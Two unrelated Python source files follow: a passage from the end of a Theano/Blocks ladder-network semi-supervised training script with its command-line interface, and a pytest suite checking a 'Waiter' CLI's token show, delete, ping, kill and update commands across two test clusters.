n_labeled=p.labeled_samples,
n_unlabeled=len(data.train_ind),
cnorm=cnorm,
whiten=whiten, scheme=ShuffledScheme),
make_datastream(data.valid, data.valid_ind,
p.valid_batch_size,
n_labeled=len(data.valid_ind),
n_unlabeled=len(data.valid_ind),
cnorm=cnorm,
whiten=whiten, scheme=ShuffledScheme),
prefix="valid_final", before_training=True),
ShortPrinting({
"valid_final": OrderedDict([
('VF_C_class', ladder.costs.class_clean),
('VF_E', ladder.error.clean),
('VF_C_de', [ladder.costs.denois.get(0),
ladder.costs.denois.get(1),
ladder.costs.denois.get(2),
ladder.costs.denois.get(3)]),
]),
}, after_training=True, use_log=False),
])
main_loop.run()
# Make a datastream that has all the indices in the labeled pathway
ds = make_datastream(dset, indices,
batch_size=p.get('batch_size'),
n_labeled=len(indices),
n_unlabeled=len(indices),
balanced_classes=False,
whiten=whiten,
cnorm=cnorm,
scheme=SequentialScheme)
# If layer=-1 we want out the values after softmax
if p.layer < 0:
# ladder.act.clean.unlabeled.h is a dict not a list
outputs = ladder.act.clean.unlabeled.h[len(ladder.layers) + p.layer]
else:
outputs = ladder.act.clean.unlabeled.h[p.layer]
# Replace the batch normalization paramameters with the shared variables
if calc_batchnorm:
outputreplacer = TestMonitoring()
_, _, outputs = outputreplacer._get_bn_params(outputs)
cg = ComputationGraph(outputs)
f = cg.get_theano_function()
it = ds.get_epoch_iterator(as_dict=True)
res = []
# Loop over one epoch
for d in it:
# Store outputs
res += [f(*[d[str(inp)] for inp in cg.inputs])]
# Concatenate all minibatches
res = [numpy.vstack(minibatches) for minibatches in zip(*res)]
return res[0]
def train(cli_params):
cli_params['save_dir'] = prepare_dir(cli_params['save_to'])
logfile = os.path.join(cli_params['save_dir'], 'log.txt')
# Log also DEBUG to a file
fh = logging.FileHandler(filename=logfile)
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
logger.info('Logging into %s' % logfile)
p, loaded = load_and_log_params(cli_params)
in_dim, data, whiten, cnorm = setup_data(p, test_set=False)
if not loaded:
# Set the zero layer to match input dimensions
p.encoder_layers = (in_dim,) + p.encoder_layers
ladder = setup_model(p)
# Training
all_params = ComputationGraph([ladder.costs.total]).parameters
logger.info('Found the following parameters: %s' % str(all_params))
# Fetch all batch normalization updates. They are in the clean path.
bn_updates = ComputationGraph([ladder.costs.class_clean]).updates
assert 'counter' in [u.name for u in bn_updates.keys()], \
'No batch norm params in graph - the graph has been cut?'
training_algorithm = GradientDescent(
cost=ladder.costs.total, parameters=all_params,
step_rule=Adam(learning_rate=ladder.lr))
# In addition to actual training, also do BN variable approximations
training_algorithm.add_updates(bn_updates)
short_prints = {
"train": {
'T_C_class': ladder.costs.class_corr,
'T_C_de': ladder.costs.denois.values(),
'T_T': ladder.costs.total,
},
"valid_approx": OrderedDict([
('V_C_class', ladder.costs.class_clean),
('V_E', ladder.error.clean),
('V_C_de', ladder.costs.denois.values()),
('V_T', ladder.costs.total),
]),
"valid_final": OrderedDict([
('VF_C_class', ladder.costs.class_clean),
('VF_E', ladder.error.clean),
('VF_C_de', ladder.costs.denois.values()),
('V_T', ladder.costs.total),
]),
}
main_loop = MainLoop(
training_algorithm,
# Datastream used for training
make_datastream(data.train, data.train_ind,
p.batch_size,
n_labeled=p.labeled_samples,
n_unlabeled=p.unlabeled_samples,
whiten=whiten,
cnorm=cnorm,
dseed=p.dseed),
model=Model(ladder.costs.total),
extensions=[
FinishAfter(after_n_epochs=p.num_epochs),
# This will estimate the validation error using
# running average estimates of the batch normalization
# parameters, mean and variance
ApproxTestMonitoring(
[ladder.costs.class_clean, ladder.error.clean, ladder.costs.total]
+ ladder.costs.denois.values(),
make_datastream(data.valid, data.valid_ind,
p.valid_batch_size, whiten=whiten, cnorm=cnorm,
scheme=ShuffledScheme),
prefix="valid_approx"),
# This Monitor is slower, but more accurate since it will first
# estimate batch normalization parameters from training data and
# then do another pass to calculate the validation error.
FinalTestMonitoring(
[ladder.costs.class_clean, ladder.error.clean, ladder.costs.total]
+ ladder.costs.denois.values(),
make_datastream(data.train, data.train_ind,
p.batch_size,
n_labeled=p.labeled_samples,
whiten=whiten, cnorm=cnorm,
scheme=ShuffledScheme),
make_datastream(data.valid, data.valid_ind,
p.valid_batch_size,
n_labeled=len(data.valid_ind),
whiten=whiten, cnorm=cnorm,
scheme=ShuffledScheme),
prefix="valid_final",
after_n_epochs=p.num_epochs, after_training=True),
TrainingDataMonitoring(
[ladder.costs.total, ladder.costs.class_corr,
training_algorithm.total_gradient_norm]
+ ladder.costs.denois.values(),
prefix="train", after_epoch=True),
SaveParams(('train',ladder.costs.total), all_params, p.save_dir, after_epoch=True),
SaveExpParams(p, p.save_dir, before_training=True),
SaveLog(p.save_dir, after_training=True),
ShortPrinting(short_prints),
LRDecay(ladder.lr, p.num_epochs * p.lrate_decay, p.num_epochs,
after_epoch=True),
])
main_loop.run()
# Get results
df = DataFrame.from_dict(main_loop.log, orient='index')
col = 'valid_final_error_rate_clean'
logger.info('%s %g' % (col, df[col].iloc[-1]))
if main_loop.log.status['epoch_interrupt_received']:
return None
return df
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
rep = lambda s: s.replace('-', ',')
chop = lambda s: s.split(',')
to_int = lambda ss: [int(s) for s in ss if s.isdigit()]
to_float = lambda ss: [float(s) for s in ss]
def to_bool(s):
if s.lower() in ['true', 't']:
return True
elif s.lower() in ['false', 'f']:
return False
else:
raise Exception("Unknown bool value %s" % s)
def compose(*funs):
return functools.reduce(lambda f, g: lambda x: f(g(x)), funs)
# Functional parsing logic to allow flexible function compositions
# as actions for ArgumentParser
def funcs(additional_arg):
class customAction(Action):
def __call__(self, parser, args, values, option_string=None):
def process(arg, func_list):
if arg is None:
return None
elif type(arg) is list:
return map(compose(*func_list), arg)
else:
return compose(*func_list)(arg)
setattr(args, self.dest, process(values, additional_arg))
return customAction
def add_train_params(parser, use_defaults):
a = parser.add_argument
default = lambda x: x if use_defaults else None
# General hyper parameters and settings
a("save_to", help="Destination to save the state and results",
default=default("noname"), nargs="?")
a("--num-epochs", help="Number of training epochs",
type=int, default=default(150))
a("--seed", help="Seed",
type=int, default=default([1]), nargs='+')
a("--dseed", help="Data permutation seed, defaults to 'seed'",
type=int, default=default([None]), nargs='+')
a("--labeled-samples", help="How many supervised samples are used",
type=str, default=default(None), nargs='+', action=funcs([tuple, to_int, chop]))
a("--unlabeled-samples", help="How many unsupervised samples are used",
type=int, default=default(None), nargs='+')
a("--dataset", type=str, default=default(['mnist']), nargs='+',
help="Which dataset to use. mnist, cifar10 or your own hdf5")
a("--lr", help="Initial learning rate",
type=float, default=default([0.002]), nargs='+')
a("--lrate-decay", help="When to linearly start decaying lrate (0-1)",
type=float, default=default([0.67]), nargs='+')
a("--batch-size", help="Minibatch size",
type=int, default=default([100]), nargs='+')
a("--valid-batch-size", help="Minibatch size for validation data",
type=int, default=default([100]), nargs='+')
a("--valid-set-size", help="Number of examples in validation set",
type=int, default=default([10000]), nargs='+')
# Hyperparameters controlling supervised path
a("--super-noise-std", help="Noise added to supervised learning path",
type=float, default=default([0.3]), nargs='+')
a("--f-local-noise-std", help="Noise added encoder path",
type=str, default=default([0.3]), nargs='+',
action=funcs([tuple, to_float, chop]))
a("--act", nargs='+', type=str, action=funcs([tuple, chop, rep]),
default=default(["relu"]), help="List of activation functions")
a("--encoder-layers", help="List of layers for f",
type=str, default=default(()), action=funcs([tuple, chop, rep]))
# Hyperparameters controlling unsupervised training
a("--denoising-cost-x", help="Weight of the denoising cost.",
type=str, default=default([(0.,)]), nargs='+',
action=funcs([tuple, to_float, chop]))
a("--decoder-spec", help="List of decoding function types", nargs='+',
type=str, default=default(['sig']), action=funcs([tuple, chop, rep]))
a("--zestbn", type=str, default=default(['bugfix']), nargs='+',
choices=['bugfix', 'no'], help="How to do zest bn")
# Hyperparameters used for Cifar training
a("--contrast-norm", help="Scale of contrast normalization (0=off)",
type=int, default=default([0]), nargs='+')
a("--top-c", help="Have c at softmax?", action=funcs([to_bool]),
default=default([True]), nargs='+')
a("--whiten-zca", help="Whether to whiten the data with ZCA",
type=int, default=default([0]), nargs='+')
ap = ArgumentParser("Semisupervised experiment")
subparsers = ap.add_subparsers(dest='cmd', help='sub-command help')
# TRAIN
train_cmd = subparsers.add_parser('train', help='Train a new model')
add_train_params(train_cmd, use_defaults=True)
# EVALUATE
load_cmd = subparsers.add_parser('evaluate', help='Evaluate test error')
load_cmd.add_argument('load_from', type=str,
help="Destination to load the state from")
load_cmd.add_argument('--data-type', type=str, default='test',
help="Data set to evaluate on")
# DUMP
dump_cmd = subparsers.add_parser('dump', help='Store the output of an encoder layer for all inputs')
dump_cmd.add_argument('load_from', type=str,
help="Destination to load the state from, and where to save the dump")
dump_cmd.add_argument('--data-type', type=str, default='test',
help="Data set to evaluate on")
dump_cmd.add_argument("--layer", type=int, default=-1,
help="which layer to dump (default top)")
args = ap.parse_args()
subp = subprocess.Popen(['git', 'rev-parse', 'HEAD'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = subp.communicate()
args.commit = out.strip()
if err.strip():
logger.error('Subprocess returned %s' % err.strip())
t_start = time.time()
if args.cmd == 'evaluate':
for k, v in vars(args).iteritems():
if type(v) is list:
assert len(v) == 1, "should not be a list when loading: %s" % k
logger.info("%s" % str(v[0]))
vars(args)[k] = v[0]
err = get_error(vars(args))
logger.info('Test error: %f' % err)
elif args.cmd == 'dump':
layer = dump_unlabeled_encoder(vars(args))
fname = os.path.join(args.load_from,'layer%d'%args.layer)
logger.info("Saving dump to %s" % fname)
numpy.save(fname, layer)
elif args.cmd == "train":
listdicts = {k: v for k, v in vars(args).iteritems() if type(v) is list}
therest = {k: v for k, v in vars(args).iteritems() if type(v) is not list}
gen1, gen2 = tee(product(*listdicts.itervalues()))
l = len(list(gen1))
for i, d in enumerate(dict(izip(listdicts, x)) for x in gen2):
if l > 1:
logger.info('Training configuration %d / %d' % (i+1, l))
d.update(therest)
if train(d) is None:
break
logger.info('Took %.1f minutes' % ((time.time() - t_start) / 60.))
|
|
import logging
import os
from sys import version
import unittest
import uuid
import re
import pytest
from tests.waiter import cli, util
@pytest.mark.cli
@unittest.skipUnless(util.multi_cluster_tests_enabled(), 'Requires setting WAITER_TEST_MULTI_CLUSTER')
@pytest.mark.timeout(util.DEFAULT_TEST_TIMEOUT_SECS)
class MultiWaiterCliTest(util.WaiterTest):
@classmethod
def setUpClass(cls):
cls.waiter_url_1 = util.retrieve_waiter_url()
cls.waiter_url_2 = util.retrieve_waiter_url('WAITER_URL_2', 'http://localhost:9191')
util.init_waiter_session(cls.waiter_url_1, cls.waiter_url_2)
cli.write_base_config()
def setUp(self):
self.waiter_url_1 = type(self).waiter_url_1
self.waiter_url_2 = type(self).waiter_url_2
self.logger = logging.getLogger(__name__)
self.waiter_1_cluster = util.retrieve_waiter_cluster_name(self.waiter_url_1)
self.waiter_2_cluster = util.retrieve_waiter_cluster_name(self.waiter_url_2)
def __two_cluster_config(self):
return {'clusters': [{'name': 'waiter1', 'url': self.waiter_url_1},
{'name': 'waiter2', 'url': self.waiter_url_2}]}
def test_federated_show(self):
# Create in cluster #1
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
# Single query for the token name, federated across clusters
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
cp, tokens = cli.show_token('json', token_name=token_name, flags='--config %s' % path)
versions = [t['version'] for t in tokens]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens), tokens)
self.assertIn(version_1, versions)
# Create in cluster #2
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
# Again, single query for the token name, federated across clusters
cp, tokens = cli.show_token('json', token_name=token_name, flags='--config %s' % path)
versions = [t['version'] for t in tokens]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(tokens), tokens)
self.assertIn(version_1, versions)
self.assertIn(version_2, versions)
finally:
util.delete_token(self.waiter_url_2, token_name)
finally:
util.delete_token(self.waiter_url_1, token_name)
def __test_show_single_cluster_group(self, no_services=False, enforce_cluster=False):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'production'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
token_1 = util.minimal_service_description(**{'cluster': 'waiter1', 'version': version_1})
util.post_token(self.waiter_url_1, token_name, token_1, update_mode_admin=True)
try:
service_id_1 = util.ping_token(self.waiter_url_1, token_name)
version_2 = str(uuid.uuid4())
token_2 = util.minimal_service_description(**{'cluster': 'waiter1', 'version': version_2})
util.post_token(self.waiter_url_2, token_name, token_2, update_mode_admin=True)
try:
service_id_2 = util.ping_token(self.waiter_url_2, token_name)
with cli.temp_config_file(config) as path:
show_flags = '--no-services' if no_services else ''
cli_flags = f'--config {path}' + (' --cluster waiter1' if enforce_cluster else '')
cp = cli.show(token_name=token_name, flags=cli_flags, show_flags=show_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
if enforce_cluster:
self.assertIn(f'waiter1 / {token_name}', cli.stdout(cp))
else:
self.assertIn(f'production / {token_name}', cli.stdout(cp))
self.assertIn(version_1, cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count(token_name))
if no_services:
self.assertNotIn(service_id_1, cli.stdout(cp))
self.assertNotIn(service_id_2, cli.stdout(cp))
else:
if enforce_cluster:
expected_service_count = 1
expected_inst_count = 1
expected_total_mem = token_1['mem']
expected_total_cpus = token_1['cpus']
else:
expected_service_count = 2
expected_inst_count = 2
expected_total_mem = token_1["mem"] + token_2["mem"]
expected_total_cpus = token_1["cpus"] + token_2["cpus"]
self.assertEqual(1, cli.stdout(cp).count(service_id_2))
self.assertIsNotNone(re.search(f'^{service_id_2}\\s+waiter2[^\\n]+Running[^\\n]+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^# Services\\s+{expected_service_count}$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^# Failing\\s+0$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^# Instances\\s+{expected_inst_count}$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^Total Memory\\s+{expected_total_mem} MiB$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^Total CPUs\\s+{expected_total_cpus}$', cli.stdout(cp), re.MULTILINE))
self.assertEqual(1, cli.stdout(cp).count(service_id_1))
self.assertIsNotNone(re.search(f'^{service_id_1}\\s+waiter1[^\\n]+Running[^\\n]+Current$', cli.stdout(cp), re.MULTILINE))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=True, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True, kill_services=True)
def test_show_single_cluster_group(self):
self.__test_show_single_cluster_group()
def test_show_single_cluster_group_no_services(self):
self.__test_show_single_cluster_group(no_services=True)
def test_show_single_cluster_group_enforce_cluster(self):
self.__test_show_single_cluster_group(enforce_cluster=True)
def __test_show_multiple_cluster_groups(self, no_services=False, enforce_cluster=False):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'staging'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
token_1 = util.minimal_service_description(**{'cluster': 'waiter1', 'version': version_1})
util.post_token(self.waiter_url_1, token_name, token_1, update_mode_admin=True)
try:
service_id_1 = util.ping_token(self.waiter_url_1, token_name)
version_2 = str(uuid.uuid4())
token_2 = util.minimal_service_description(**{'cluster': 'waiter2', 'version': version_2})
util.post_token(self.waiter_url_2, token_name, token_2, update_mode_admin=True)
try:
service_id_2 = util.ping_token(self.waiter_url_2, token_name)
with cli.temp_config_file(config) as path:
show_flags = '--no-services' if no_services else ''
cli_flags = f'--config {path}' + (' --cluster waiter1' if enforce_cluster else '')
cp = cli.show(token_name=token_name, flags=cli_flags, show_flags=show_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(re.findall(f'^Version\\s+{version_1}$', cli.stdout(cp), re.MULTILINE)))
if enforce_cluster:
expected_token_count = 1
self.assertIn(f'waiter1 / {token_name}', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count(token_name))
else:
expected_token_count = 2
self.assertIn(f'production / {token_name}', cli.stdout(cp))
self.assertIn(f'staging / {token_name}', cli.stdout(cp))
self.assertEqual(1, len(re.findall(f'^Version\\s+{version_2}$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(2, cli.stdout(cp).count(token_name))
if no_services:
self.assertNotIn(service_id_1, cli.stdout(cp))
self.assertNotIn(service_id_2, cli.stdout(cp))
else:
self.assertEqual(1, cli.stdout(cp).count(service_id_1))
self.assertEqual(expected_token_count, len(re.findall('^# Services\\s+1$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall('^# Failing\\s+0$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall('^# Instances\\s+1$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall(f'^Total Memory\\s+{token_1["mem"]} MiB$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall(f'^Total CPUs\\s+{token_1["cpus"]}$', cli.stdout(cp), re.MULTILINE)))
self.assertIsNotNone(re.search(f'^{service_id_1}\\s+waiter1[^\\n]+Running[^\\n]+Current$', cli.stdout(cp), re.MULTILINE))
if not enforce_cluster:
self.assertEqual(1, cli.stdout(cp).count(service_id_2))
self.assertEqual(1, cli.stdout(cp).count(service_id_2))
self.assertIsNotNone(re.search(f'^{service_id_2}\\s+waiter2[^\\n]+Running[^\\n]+Current$', cli.stdout(cp), re.MULTILINE))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=True, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True, kill_services=True)
def test_show_multiple_cluster_groups(self):
self.__test_show_multiple_cluster_groups()
def test_show_multiple_cluster_groups_no_services(self):
self.__test_show_multiple_cluster_groups(no_services=True)
def test_show_multiple_cluster_groups_enforce_cluster(self):
self.__test_show_multiple_cluster_groups(enforce_cluster=True)
def test_federated_delete(self):
# Create in cluster #1
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
# Create in cluster #2
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Delete the token in both clusters
cp = cli.delete(token_name=token_name, flags='--config %s' % path, delete_flags='--force')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('exists in 2 cluster(s)', cli.stdout(cp))
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Deleting token'))
self.assertEqual(2, cli.stdout(cp).count('Successfully deleted'))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_delete_single_cluster(self):
# Create in cluster #1
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
# Create in cluster #2
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Delete the token in one cluster only
cp = cli.delete(token_name=token_name, flags=f'--config {path} --cluster waiter2')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertNotIn('exists in 2 clusters', cli.stdout(cp))
self.assertNotIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count('Deleting token'))
self.assertEqual(1, cli.stdout(cp).count('Successfully deleted'))
util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True)
def test_delete_token_in_multiple_cluster_groups(self):
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# failed delete because the target cluster couldn't be inferred when the token is in mutliple cluster groups
cp = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Could not infer the target cluster for this operation', cli.stderr(cp))
self.assertIn('waiter1', cli.stderr(cp))
self.assertIn('waiter2', cli.stderr(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True)
def test_delete_token_in_single_cluster_group(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'production'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'cluster': 'waiter1', 'version': version_1}, update_mode_admin=True)
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'cluster': 'waiter1', 'version': version_2}, update_mode_admin=True)
try:
with cli.temp_config_file(config) as path:
# deletes token in the primary cluster only, and relies on token syncer that will sync the delete
cp = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Successfully deleted {token_name} in waiter1.', cli.stdout(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
# attempting to delete again yields a no-op as the token is effectively deleted in the cluster group
cp_noop = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(1, cp_noop.returncode, cp_noop.stderr)
self.assertIn('No matching data found in', cli.stdout(cp_noop))
self.assertIn('waiter1', cli.stdout(cp_noop))
self.assertIn('waiter2', cli.stdout(cp_noop))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=True)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_delete_token_in_single_cluster_group_force(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'production'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
with cli.temp_config_file(config) as path:
# deletes token in the primary cluster with force will delete the token in all clusters, not just primary cluster
cp = cli.delete(token_name=token_name, flags=f'--config {path}', delete_flags='-f')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Successfully deleted {token_name} in waiter1.', cli.stdout(cp))
self.assertIn(f'Successfully deleted {token_name} in waiter2.', cli.stdout(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
# attempting to delete again yields a no-op as the token should be completely deleted
cp_noop = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(1, cp_noop.returncode, cp_noop.stderr)
self.assertIn('No matching data found in', cli.stdout(cp_noop))
self.assertIn('waiter1', cli.stdout(cp_noop))
self.assertIn('waiter2', cli.stdout(cp_noop))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_delete_token_sync_disabled(self):
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2,
'metadata': {'waiter-token-sync-opt-out': 'true'}})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Delete the token in both clusters
cp = cli.delete(token_name=token_name, flags=f'--config {path}', stdin='Yes\nYes\n'.encode('utf8'))
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Successfully deleted {token_name} in waiter1.', cli.stdout(cp))
self.assertIn(f'Successfully deleted {token_name} in waiter2.', cli.stdout(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_federated_ping(self):
# Create in cluster #1
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description())
try:
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description())
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Ping the token in both clusters
cp = cli.ping(token_name_or_service_id=token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Pinging token'))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_1, token_name)))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_2, token_name)))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_federated_kill(self):
# Create in cluster #1
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description())
try:
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description())
try:
# Ping the token in both clusters
util.ping_token(self.waiter_url_1, token_name)
util.ping_token(self.waiter_url_2, token_name)
# Kill the services in both clusters
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
cp = cli.kill(token_name_or_service_id=token_name, flags=f'--config {path}', kill_flags='--force')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Killing service'))
self.assertEqual(2, cli.stdout(cp).count('Successfully killed'))
self.assertEqual(0, len(util.services_for_token(self.waiter_url_1, token_name)))
self.assertEqual(0, len(util.services_for_token(self.waiter_url_2, token_name)))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_federated_kill_service_id(self):
# Create in cluster #1
token_name = self.token_name()
service_description = util.minimal_service_description()
util.post_token(self.waiter_url_1, token_name, service_description)
try:
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, service_description)
try:
# Ping the token in both clusters
service_id_1 = util.ping_token(self.waiter_url_1, token_name)
service_id_2 = util.ping_token(self.waiter_url_2, token_name)
self.assertEqual(service_id_1, service_id_2)
# Kill the services in both clusters
util.kill_services_using_token(self.waiter_url_1, token_name)
util.kill_services_using_token(self.waiter_url_2, token_name)
# Attempt to kill using the CLI
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# First with --force
cp = cli.kill(token_name_or_service_id=service_id_1, flags=f'--config {path}',
kill_flags='--force --service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('cannot be killed because it is already Inactive'))
# Then, without --force
cp = cli.kill(token_name_or_service_id=service_id_1, flags=f'--config {path}',
kill_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'waiter1 / {service_id_1}', cli.stdout(cp))
self.assertIn(f'waiter2 / {service_id_2}', cli.stdout(cp))
self.assertIn(f'{self.waiter_url_1}/apps/{service_id_1}', cli.stdout(cp))
self.assertIn(f'{self.waiter_url_2}/apps/{service_id_2}', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('cannot be killed because it is already Inactive'))
self.assertEqual(2, cli.stdout(cp).count('Run as user'))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_update_non_default_cluster(self):
# Set up the config so that cluster #1 is the default
config = {'clusters': [{'name': 'waiter1', 'url': self.waiter_url_1, 'default-for-create': True},
{'name': 'waiter2', 'url': self.waiter_url_2}]}
# Create in cluster #2 (the non-default)
token_name = self.token_name()
service_description = util.minimal_service_description()
util.post_token(self.waiter_url_2, token_name, service_description)
try:
# Update using the CLI, which should update in cluster #2
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertNotIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
token_1 = util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertNotIn('version', token_1)
self.assertEqual(version, token_2['version'])
finally:
util.delete_token(self.waiter_url_2, token_name)
